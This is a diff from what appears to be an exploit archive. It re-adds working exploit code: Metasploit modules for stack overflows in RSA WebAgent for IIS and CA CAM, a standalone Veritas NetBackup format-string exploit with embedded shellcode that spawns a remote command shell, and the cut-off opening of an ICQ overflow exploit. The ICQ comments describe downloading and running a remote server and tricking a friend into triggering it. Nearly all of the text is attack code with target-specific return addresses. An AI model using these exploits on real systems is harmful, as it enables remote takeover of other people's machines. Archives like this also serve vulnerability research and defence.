$s->GetError); - return $self->CheckCode('Connect'); - } - - $s->Send("GET ".$self->GetVar('URL')."?GetPic?image=msf HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n"); - - my $r = $s->Recv(-1, 5); - - if ($r =~ /RSA Web Access Authentication/) - { - $self->PrintLine("[*] Found IISWebAgentIF.dll ;)"); - return $self->CheckCode('Detected'); - } else { - - $self->PrintLine("The IISWebAgentIF.dll ISAPI does not appear to be installed"); - return $self->CheckCode('Safe'); - } -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target = $self->Targets->[ $target_idx ]; - - $self->PrintLine("[*] Attempting to exploit target ".$target->[0]); - - - my $pattern = Pex::Text::AlphaNumText(8192); - # Just don't ask. - $pattern =~ s/\d|Z/A/ig; - - substr($pattern, $target->[1] , 4, pack('V', $target->[2])); - substr($pattern, $target->[1] - 4, 2, "\xeb\x06"); - substr($pattern, $target->[1] + 4, length($shellcode), $shellcode); - - my $request = - "GET ".$self->GetVar('URL')."?Redirect?url=$pattern HTTP/1.1\r\n". - "Host: $target_host:$target_port\r\n\r\n"; - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $self->PrintLine("[*] Sending " .length($request) . " bytes to remote host."); - $s->Send($request); - - $self->PrintLine("[*] Waiting for a response..."); - $s->Recv(-1, 10); - $self->Handler($s); - $s->Close(); - return; -} - -# milw0rm.com [2005-10-19] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. 
In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::rsa_iiswebagent_redirect; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'IIS RSA WebAgent Redirect Overflow', + 'Version' => '$Revision: 1.4 $', + 'Authors' => [ 'H D Moore ', ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32' ], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 80], + 'SSL' => [0, 'BOOL', 'Use SSL'], + 'URL' => [1, 'DATA', 'The path to the DLL', '/WebID/IISWebAgentIF.dll'], + }, + + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => + "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f". + "\x3a\x3b\x3c\x3d\x3e\x3f\x40\x5c". "Z", + + 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", + 'Keys' => ['+ws2ord'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits a stack overflow in the SecurID Web Agent for IIS. + This ISAPI filter runs in-process with inetinfo.exe, any attempt to + exploit this flaw will result in the termination and potential restart + of the IIS service. +}), + + 'Refs' => + [ + # Anyone got a patch/advisory/solution URL? 
+ ], + + 'Targets' => + [ + # Version-specific return addresses + ['RSA WebAgent 5.2', 996, 0x1001e694], + ['RSA WebAgent 5.3', 992, 0x10010e89], + + # Generic return addresses + ['RSA WebAgent 5.2 on Windows 2000 English', 996, 0x75022ac4], + ['RSA WebAgent 5.3 on Windows 2000 English', 992, 0x75022ac4], + + ['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', 996, 0x71ab1d54], + ['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', 992, 0x71ab1d54], + + ['RSA WebAgent 5.2 on Windows XP SP2 English', 996, 0x71ab9372], + ['RSA WebAgent 5.3 on Windows XP SP2 English', 992, 0x71ab9372], + + ['RSA WebAgent 5.2 on Windows 2003 English SP0', 996, 0x7ffc0638], + ['RSA WebAgent 5.3 on Windows 2003 English SP0', 992, 0x7ffc0638], + + ], + + 'Keys' => ['rsa'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Check { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError); + return $self->CheckCode('Connect'); + } + + $s->Send("GET ".$self->GetVar('URL')."?GetPic?image=msf HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n"); + + my $r = $s->Recv(-1, 5); + + if ($r =~ /RSA Web Access Authentication/) + { + $self->PrintLine("[*] Found IISWebAgentIF.dll ;)"); + return $self->CheckCode('Detected'); + } else { + + $self->PrintLine("The IISWebAgentIF.dll ISAPI does not appear to be installed"); + return $self->CheckCode('Safe'); + } +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target = $self->Targets->[ $target_idx ]; + + $self->PrintLine("[*] Attempting to exploit target ".$target->[0]); + + + my $pattern = Pex::Text::AlphaNumText(8192); + # Just don't ask. + $pattern =~ s/\d|Z/A/ig; + + substr($pattern, $target->[1] , 4, pack('V', $target->[2])); + substr($pattern, $target->[1] - 4, 2, "\xeb\x06"); + substr($pattern, $target->[1] + 4, length($shellcode), $shellcode); + + my $request = + "GET ".$self->GetVar('URL')."?Redirect?url=$pattern HTTP/1.1\r\n". + "Host: $target_host:$target_port\r\n\r\n"; + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $self->PrintLine("[*] Sending " .length($request) . " bytes to remote host."); + $s->Send($request); + + $self->PrintLine("[*] Waiting for a response..."); + $s->Recv(-1, 10); + $self->Handler($s); + $s->Close(); + return; +} + +# milw0rm.com [2005-10-19] diff --git a/platforms/windows/remote/1262.pm b/platforms/windows/remote/1262.pm index 09d5870e5..719374b60 100755 --- a/platforms/windows/remote/1262.pm +++ b/platforms/windows/remote/1262.pm 
@@ -1,120 +1,120 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::cacam_logsecurity_win32; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'CA CAM log_security() Stack Overflow (Win32)', - 'Version' => '$Revision: 1.1 $', - 'Authors' => [ 'H D Moore ' ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'], - 'Priv' => 1, - 'AutoOpts' => { 'EXITFUNC' => 'process' }, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 4105], - }, - - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 - 'Keys' => ['+ws2ord'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a vulnerability in the CA CAM service by passing - a long parameter to the log_security() function. The CAM service is part - of TNG Unicenter. This module has been tested on Unicenter v3.1. 
-}), - - 'Refs' => - [ - - ], - - 'DefaultTarget' => 0, - 'Targets' => - [ - # W2API.DLL @ 0x01950000 - return to ESI - # $Header: /home/mscvs/framework/exploits/cacam_logsecurity_win32.pm,v 1.1 2005/10/15 14:13:50 hdm Exp $ - ['W2API.DLL TNG 2.3', 0x01951107], - - # return to ESI in ws2help.dll - ['Windows 2000 SP0-SP4 English', 0x750217ae], - ['Windows XP SP0-SP1 English', 0x71aa16e5], - ['Windows XP SP2 English', 0x71aa1b22], - ['Windows 2003 SP0 English', 0x71bf175f], - ], - - 'Keys' => ['cam'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target = $self->Targets->[$target_idx]; - - $self->PrintLine("[*] Attempting to exploit target " . $target->[0]); - - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - my $pattern = Pex::Text::EnglishText(4096); - - # Offset 1016 for EIP, 1024 = ESP, 1052 = ESI - substr($pattern, 1016, 4, pack('V', $target->[1])); - substr($pattern, 1052, length($shellcode), $shellcode); - - my $req = - "\xfa\xf9\x00\x10" . $pattern . "\x00"; - - my $ack = $s->Recv(4, 5); - if ($ack ne "ACK\x00") { - $self->PrintLine("[*] The CAM service is not responding."); - return; - } - $s->Send($req); - $s->Recv(-1,1); - $self->Handler($s); - $s->Close(); - - return; -} - -1; - -# milw0rm.com [2005-10-19] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. 
In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::cacam_logsecurity_win32; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'CA CAM log_security() Stack Overflow (Win32)', + 'Version' => '$Revision: 1.1 $', + 'Authors' => [ 'H D Moore ' ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'], + 'Priv' => 1, + 'AutoOpts' => { 'EXITFUNC' => 'process' }, + + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 4105], + }, + + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 + 'Keys' => ['+ws2ord'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits a vulnerability in the CA CAM service by passing + a long parameter to the log_security() function. The CAM service is part + of TNG Unicenter. This module has been tested on Unicenter v3.1. 
+}), + + 'Refs' => + [ + + ], + + 'DefaultTarget' => 0, + 'Targets' => + [ + # W2API.DLL @ 0x01950000 - return to ESI + # $Header: /home/mscvs/framework/exploits/cacam_logsecurity_win32.pm,v 1.1 2005/10/15 14:13:50 hdm Exp $ + ['W2API.DLL TNG 2.3', 0x01951107], + + # return to ESI in ws2help.dll + ['Windows 2000 SP0-SP4 English', 0x750217ae], + ['Windows XP SP0-SP1 English', 0x71aa16e5], + ['Windows XP SP2 English', 0x71aa1b22], + ['Windows 2003 SP0 English', 0x71bf175f], + ], + + 'Keys' => ['cam'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target = $self->Targets->[$target_idx]; + + $self->PrintLine("[*] Attempting to exploit target " . $target->[0]); + + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + my $pattern = Pex::Text::EnglishText(4096); + + # Offset 1016 for EIP, 1024 = ESP, 1052 = ESI + substr($pattern, 1016, 4, pack('V', $target->[1])); + substr($pattern, 1052, length($shellcode), $shellcode); + + my $req = + "\xfa\xf9\x00\x10" . $pattern . "\x00"; + + my $ack = $s->Recv(4, 5); + if ($ack ne "ACK\x00") { + $self->PrintLine("[*] The CAM service is not responding."); + return; + } + $s->Send($req); + $s->Recv(-1,1); + $self->Handler($s); + $s->Close(); + + return; +} + +1; + +# milw0rm.com [2005-10-19] diff --git a/platforms/windows/remote/1264.pl b/platforms/windows/remote/1264.pl index eb9c8410c..f85f7e256 100755 --- a/platforms/windows/remote/1264.pl +++ b/platforms/windows/remote/1264.pl 
@@ -1,339 +1,339 @@ -#!C:\Perl\bin\perl.exe -w -# -# Vertias Netbackup Win32 format string exploit -# Code By: johnh[at]digitalmunition[dot]com & kf[at]digitalmunition[dot]com -# -# For win2k/xp pre sp2 we overwrote PEBFastlock -> rtlentercritical -# For win xp sp2 we overwrote SEH -# http://www.digitalmunition.com/ -# -# You may have to run this 2 times. - -use IO::Socket; -use Getopt::Std; getopts('h:p:t:', \ our %args); - -if (defined($args{'h'})) { $host = $args{'h'}; } -if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 13722;} -if (defined($args{'t'})) { $target = $args{'t'}; } - - -print "\n-=[Remote Veritas NetBackup Format String exploit]=-\n\n"; -print "\n-=[TagTeam johnh[at]digitalmunition[dot]com and kf_lists[at]digitalmunition[dot]com]=-\n\n"; - -if(!defined($host)){ -print "Usage: - -h - -p port - -t target: - 0 - Windows 2k/Windows XP SP0/SP1 - PEB - 1 - Windows XP SP2 - SEH\n\n"; -exit(1); -} - - - -my $sock = new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto => 'tcp'); -$sock or die "no socket :$!"; - -# 970 chars in length. - - - - - - - - -my $shellcode = "\x90"x100; -$shellcode .= - "\xeb\x42" . - "\x56". - "\x57". - "\x8b\x45\x3c". - "\x8b\x54\x05\x78". - "\x01\xea" . - "\x52" . - "\x8b\x52\x20". - "\x01\xea". - "\x31\xc0". - "\x31\xc9". - "\x41" . - "\x8b\x34\x8a". - "\x01\xee". - "\x31\xff". - "\xc1\xcf\x13" . - "\xac" . - "\x01\xc7". - "\x85\xc0". - "\x75\xf6". - "\x39\xdf". - "\x75\xea". - "\x5a" . - "\x8b\x5a\x24" . - "\x01\xeb" . - "\x66\x8b\x0c\x4b". - "\x8b\x5a\x1c" . - "\x01\xeb" . - "\x8b\x04\x8b" . - "\x01\xe8" . - "\x5f" . - "\x5e" . - "\xc3" . - "\xfc" . - "\x31\xc0". - "\x64\x8b\x40\x30". - "\x8d\x78\x20" . - "\x8b\x40\x0c" . - "\x8b\x70\x1c" . - "\xad" . - "\x8b\x68\x08". - "\x89\xee". - "\x31\xc0". - "\x64\x8b\x40\x30". - "\x8b\x40\x0c" . - "\x8b\x40\x1c" . - "\x8b\x68\x08" . - "\xbb\x6f\x5b\x8b\x9c". - "\xe8\x8f\xff\xff\xff". - "\xab" . - "\xbb\xe1\x0f\xfe\xb7". - "\xe8\x84\xff\xff\xff". - "\xab" . 
- "\x89\xf5". - "\x31\xc0". - "\x66\xb8\x6c\x6c". - "\x50" . - "\x68\x33\x32\x2e\x64". - "\x68\x77\x73\x32\x5f". - "\x54" . - "\xbb\x71\xa7\xe8\xfe" . - "\xe8\x65\xff\xff\xff" . - "\xff\xd0" . - "\x89\xef" . - "\x89\xc5" . - "\x81\xc4\x70\xfe\xff\xff" . - "\x54" . - "\x31\xc0". - "\xfe\xc4". - "\x40" . - "\x50" . - "\xbb\x22\x7d\xab\x7d". - "\xe8\x48\xff\xff\xff". - "\xff\xd0" . - "\x31\xc0" . - "\x50" . - "\x50" . - "\x50" . - "\x50" . - "\x40" . - "\x50" . - "\x40" . - "\x50" . - "\xbb\xa6\x55\x34\x79". - "\xe8\x32\xff\xff\xff". - "\xff\xd0" . - "\x89\xc6" . - "\x31\xc0" . - "\x50" . - "\x50" . - "\x35\x02\x01\x70\xcc". - "\xfe\xcc" . - "\x50" . - "\x89\xe0". - "\x50" . - "\x6a\x10" . - "\x50" . - "\x56" . - "\xbb\x81\xb4\x2c\xbe" . - "\xe8\x11\xff\xff\xff" . - "\xff\xd0" . - "\x31\xc0" . - "\x50" . - "\x56" . - "\xbb\xd3\xfa\x58\x9b" . - "\xe8\x01\xff\xff\xff" . - "\xff\xd0" . - "\x58" . - "\x60" . - "\x6a\x10". - "\x54" . - "\x50" . - "\x56" . - "\xbb\x47\xf3\x56\xc6". - "\xe8\xee\xfe\xff\xff". - "\xff\xd0" . - "\x89\xc6" . - "\x31\xdb" . - "\x53" . - "\x68\x2e\x63\x6d\x64". - "\x89\xe1" . - "\x41" . - "\x31\xdb". - "\x56" . - "\x56" . - "\x56" . - "\x53" . - "\x53" . - "\x31\xc0". - "\xfe\xc4". - "\x40" . - "\x50" . - "\x53" . - "\x53" . - "\x53" . - "\x53" . - "\x53" . - "\x53" . - "\x53" . - "\x53" . - "\x53" . - "\x53" . - "\x6a\x44". - "\x89\xe0". - "\x53" . - "\x53" . - "\x53" . - "\x53" . - "\x54" . - "\x50" . - "\x53" . - "\x53" . - "\x53" . - "\x43" . - "\x53" . - "\x4b" . - "\x53" . - "\x53" . - "\x51" . - "\x53" . - "\x87\xfd" . - "\xbb\x21\xd0\x05\xd0". - "\xe8\xa8\xfe\xff\xff". - "\xff\xd0" . - "\x5b" . - "\x31\xc0". - "\x48" . - "\x50" . - "\x53" . - "\xbb\x43\xcb\x8d\x5f". - "\xe8\x96\xfe\xff\xff". - "\xff\xd0" . - "\x56" . - "\x87\xef". - "\xbb\x12\x6b\x6d\xd0". - "\xe8\x87\xfe\xff\xff". - "\xff\xd0" . - "\x83\xc4\x5c" . - "\x61" . 
- "\xeb\x81"; - - -#/* -#7FFDF250 54 PUSH ESP -#7FFDF251 5F POP EDI -#7FFDF252 B8 90909090 MOV EAX,90909090 -#7FFDF257 FD STD -#7FFDF258 F2:AF REPNE SCAS DWORD PTR ES:[EDI] -#7FFDF25A 57 PUSH EDI -#7FFDF25B C3 RETN -# -#and -# -#over write FastPebLockRoutine pointer to EnterCriticalSection with our code address of 7FFDF250 -# -#7FFDF020 7FFDF250 -# -#*/ - -print "TARGET IS $target\n"; -if ($target == 0) { -$c = 8; -@fmt_array = ( - -#WINDOWS 2K SP4/XP SP0-SP1 -#OVERWRITE PEB FASTLOCKPOINTER -> RTLEnterCriticalSection -[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x7FFDF022, 0x7FFDF020 ], -[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x7ffd, 0xf250 ], - -); -} - - -if ($target == 1) { -$c = 10; -@fmt_array = ( -#windows XP SP2 -#OVERWRITE STATIC SEH FRAME - -[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x0012ffb0, 0x0012ffb2, 0x0012ffb6, 0x0012ffb4 ], -[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x9090,0x9090,0x7FFD, 0xF250 ], -); -} - - -my $offset = 0; -my $dump_fmt=6; #amount of %.8x needed to reach stackbase -my $payload; -my $payload2; -my $hi; -my $lo; -my $last = 0; -my $flag = 2; - -my @shift; - -for (my $y = 0; $y < $c; $y = $y + 2) -{ - -$payload = "%08x" x $dump_fmt; -$payload2 = pack('l', $fmt_array[0][$y]) . "AAAA" . pack('l', $fmt_array[0][$y+1]); - -$hi = $fmt_array[1][$y] - 0x2a - 35; -$lo = $fmt_array[1][$y+1] - $hi - 77; - -$payload .= "%$hi" . "x%hn%$lo" . "x%hn"; - -print $sock " 118 1\nSNO space filler\n"; -print scalar <$sock>; -print scalar <$sock>; - -print $sock " 101 6\n" . -"$payload" . "\n" . # You must finish the line off with a line feed. -"dummy space\n" . -"$shellcode\n" . -"$payload2" . "\n" . -"spare bits\n" . -"spare bits\n\n"; - - -print scalar <$sock>; -print scalar <$sock>; - -} - - -if ($target == 1) -{ -#create exception so SEH is called -print $sock " 118 1\nSNO space filler\n"; -print scalar <$sock>; -print scalar <$sock>; - -print $sock " 101 6\n" . 
-"%n" . "\n" . # You must finish the line off with a line feed. -"dummy space\n" . -"$shellcode\n" . -"AAAAAAAAAAAA" . "\n" . -"spare bits\n" . -"spare bits\n\n"; - - -print scalar <$sock>; -print scalar <$sock>; - -} - - -close $sock; - -# milw0rm.com [2005-10-20] +#!C:\Perl\bin\perl.exe -w +# +# Vertias Netbackup Win32 format string exploit +# Code By: johnh[at]digitalmunition[dot]com & kf[at]digitalmunition[dot]com +# +# For win2k/xp pre sp2 we overwrote PEBFastlock -> rtlentercritical +# For win xp sp2 we overwrote SEH +# http://www.digitalmunition.com/ +# +# You may have to run this 2 times. + +use IO::Socket; +use Getopt::Std; getopts('h:p:t:', \ our %args); + +if (defined($args{'h'})) { $host = $args{'h'}; } +if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 13722;} +if (defined($args{'t'})) { $target = $args{'t'}; } + + +print "\n-=[Remote Veritas NetBackup Format String exploit]=-\n\n"; +print "\n-=[TagTeam johnh[at]digitalmunition[dot]com and kf_lists[at]digitalmunition[dot]com]=-\n\n"; + +if(!defined($host)){ +print "Usage: + -h + -p port + -t target: + 0 - Windows 2k/Windows XP SP0/SP1 - PEB + 1 - Windows XP SP2 - SEH\n\n"; +exit(1); +} + + + +my $sock = new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto => 'tcp'); +$sock or die "no socket :$!"; + +# 970 chars in length. + + + + + + + + +my $shellcode = "\x90"x100; +$shellcode .= + "\xeb\x42" . + "\x56". + "\x57". + "\x8b\x45\x3c". + "\x8b\x54\x05\x78". + "\x01\xea" . + "\x52" . + "\x8b\x52\x20". + "\x01\xea". + "\x31\xc0". + "\x31\xc9". + "\x41" . + "\x8b\x34\x8a". + "\x01\xee". + "\x31\xff". + "\xc1\xcf\x13" . + "\xac" . + "\x01\xc7". + "\x85\xc0". + "\x75\xf6". + "\x39\xdf". + "\x75\xea". + "\x5a" . + "\x8b\x5a\x24" . + "\x01\xeb" . + "\x66\x8b\x0c\x4b". + "\x8b\x5a\x1c" . + "\x01\xeb" . + "\x8b\x04\x8b" . + "\x01\xe8" . + "\x5f" . + "\x5e" . + "\xc3" . + "\xfc" . + "\x31\xc0". + "\x64\x8b\x40\x30". + "\x8d\x78\x20" . + "\x8b\x40\x0c" . + "\x8b\x70\x1c" . + "\xad" . 
+ "\x8b\x68\x08". + "\x89\xee". + "\x31\xc0". + "\x64\x8b\x40\x30". + "\x8b\x40\x0c" . + "\x8b\x40\x1c" . + "\x8b\x68\x08" . + "\xbb\x6f\x5b\x8b\x9c". + "\xe8\x8f\xff\xff\xff". + "\xab" . + "\xbb\xe1\x0f\xfe\xb7". + "\xe8\x84\xff\xff\xff". + "\xab" . + "\x89\xf5". + "\x31\xc0". + "\x66\xb8\x6c\x6c". + "\x50" . + "\x68\x33\x32\x2e\x64". + "\x68\x77\x73\x32\x5f". + "\x54" . + "\xbb\x71\xa7\xe8\xfe" . + "\xe8\x65\xff\xff\xff" . + "\xff\xd0" . + "\x89\xef" . + "\x89\xc5" . + "\x81\xc4\x70\xfe\xff\xff" . + "\x54" . + "\x31\xc0". + "\xfe\xc4". + "\x40" . + "\x50" . + "\xbb\x22\x7d\xab\x7d". + "\xe8\x48\xff\xff\xff". + "\xff\xd0" . + "\x31\xc0" . + "\x50" . + "\x50" . + "\x50" . + "\x50" . + "\x40" . + "\x50" . + "\x40" . + "\x50" . + "\xbb\xa6\x55\x34\x79". + "\xe8\x32\xff\xff\xff". + "\xff\xd0" . + "\x89\xc6" . + "\x31\xc0" . + "\x50" . + "\x50" . + "\x35\x02\x01\x70\xcc". + "\xfe\xcc" . + "\x50" . + "\x89\xe0". + "\x50" . + "\x6a\x10" . + "\x50" . + "\x56" . + "\xbb\x81\xb4\x2c\xbe" . + "\xe8\x11\xff\xff\xff" . + "\xff\xd0" . + "\x31\xc0" . + "\x50" . + "\x56" . + "\xbb\xd3\xfa\x58\x9b" . + "\xe8\x01\xff\xff\xff" . + "\xff\xd0" . + "\x58" . + "\x60" . + "\x6a\x10". + "\x54" . + "\x50" . + "\x56" . + "\xbb\x47\xf3\x56\xc6". + "\xe8\xee\xfe\xff\xff". + "\xff\xd0" . + "\x89\xc6" . + "\x31\xdb" . + "\x53" . + "\x68\x2e\x63\x6d\x64". + "\x89\xe1" . + "\x41" . + "\x31\xdb". + "\x56" . + "\x56" . + "\x56" . + "\x53" . + "\x53" . + "\x31\xc0". + "\xfe\xc4". + "\x40" . + "\x50" . + "\x53" . + "\x53" . + "\x53" . + "\x53" . + "\x53" . + "\x53" . + "\x53" . + "\x53" . + "\x53" . + "\x53" . + "\x6a\x44". + "\x89\xe0". + "\x53" . + "\x53" . + "\x53" . + "\x53" . + "\x54" . + "\x50" . + "\x53" . + "\x53" . + "\x53" . + "\x43" . + "\x53" . + "\x4b" . + "\x53" . + "\x53" . + "\x51" . + "\x53" . + "\x87\xfd" . + "\xbb\x21\xd0\x05\xd0". + "\xe8\xa8\xfe\xff\xff". + "\xff\xd0" . + "\x5b" . + "\x31\xc0". + "\x48" . + "\x50" . + "\x53" . + "\xbb\x43\xcb\x8d\x5f". + "\xe8\x96\xfe\xff\xff". 
+ "\xff\xd0" . + "\x56" . + "\x87\xef". + "\xbb\x12\x6b\x6d\xd0". + "\xe8\x87\xfe\xff\xff". + "\xff\xd0" . + "\x83\xc4\x5c" . + "\x61" . + "\xeb\x81"; + + +#/* +#7FFDF250 54 PUSH ESP +#7FFDF251 5F POP EDI +#7FFDF252 B8 90909090 MOV EAX,90909090 +#7FFDF257 FD STD +#7FFDF258 F2:AF REPNE SCAS DWORD PTR ES:[EDI] +#7FFDF25A 57 PUSH EDI +#7FFDF25B C3 RETN +# +#and +# +#over write FastPebLockRoutine pointer to EnterCriticalSection with our code address of 7FFDF250 +# +#7FFDF020 7FFDF250 +# +#*/ + +print "TARGET IS $target\n"; +if ($target == 0) { +$c = 8; +@fmt_array = ( + +#WINDOWS 2K SP4/XP SP0-SP1 +#OVERWRITE PEB FASTLOCKPOINTER -> RTLEnterCriticalSection +[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x7FFDF022, 0x7FFDF020 ], +[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x7ffd, 0xf250 ], + +); +} + + +if ($target == 1) { +$c = 10; +@fmt_array = ( +#windows XP SP2 +#OVERWRITE STATIC SEH FRAME + +[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x0012ffb0, 0x0012ffb2, 0x0012ffb6, 0x0012ffb4 ], +[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x9090,0x9090,0x7FFD, 0xF250 ], +); +} + + +my $offset = 0; +my $dump_fmt=6; #amount of %.8x needed to reach stackbase +my $payload; +my $payload2; +my $hi; +my $lo; +my $last = 0; +my $flag = 2; + +my @shift; + +for (my $y = 0; $y < $c; $y = $y + 2) +{ + +$payload = "%08x" x $dump_fmt; +$payload2 = pack('l', $fmt_array[0][$y]) . "AAAA" . pack('l', $fmt_array[0][$y+1]); + +$hi = $fmt_array[1][$y] - 0x2a - 35; +$lo = $fmt_array[1][$y+1] - $hi - 77; + +$payload .= "%$hi" . "x%hn%$lo" . "x%hn"; + +print $sock " 118 1\nSNO space filler\n"; +print scalar <$sock>; +print scalar <$sock>; + +print $sock " 101 6\n" . +"$payload" . "\n" . # You must finish the line off with a line feed. +"dummy space\n" . +"$shellcode\n" . +"$payload2" . "\n" . +"spare bits\n" . 
+"spare bits\n\n"; + + +print scalar <$sock>; +print scalar <$sock>; + +} + + +if ($target == 1) +{ +#create exception so SEH is called +print $sock " 118 1\nSNO space filler\n"; +print scalar <$sock>; +print scalar <$sock>; + +print $sock " 101 6\n" . +"%n" . "\n" . # You must finish the line off with a line feed. +"dummy space\n" . +"$shellcode\n" . +"AAAAAAAAAAAA" . "\n" . +"spare bits\n" . +"spare bits\n\n"; + + +print scalar <$sock>; +print scalar <$sock>; + +} + + +close $sock; + +# milw0rm.com [2005-10-20] diff --git a/platforms/windows/remote/1277.c b/platforms/windows/remote/1277.c index 0f7e13a1e..ba38645f9 100755 --- a/platforms/windows/remote/1277.c +++ b/platforms/windows/remote/1277.c 
@@ -1,123 +1,123 @@ -/* -* -* Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit -* Bug discovered & exploit coded by ATmaCA -* Web: http://www.spyinstructors.com && http://www.atmacasoft.com -* E-Mail: atmaca@icqmail.com -* Credit to Kozan and delicon -* -*/ - -/* -* Usage: -* -* Execute exploit, it will create "bof.txt" in current directory. -* Open ICQ <= 2003a and click "Add" button -* "Add / Invite Users to Your Contact List" dialog will be opened -* Copy the content of "bof.txt" to "First name" and "Last name" fields. -* Press "find" button -* -* Now, icq will download and run your server which you specified in WebUrl field. -* -* This exploit requires social engineering skills to use it. For example you should -* tell your friend that you've found a easter-egg and if he wants to see it he has to -* type your vuln. string to first and last name fields in icq then press find button etc... -* - -/* -* -* Affected versions: -* Mirabilis ICQ Pro 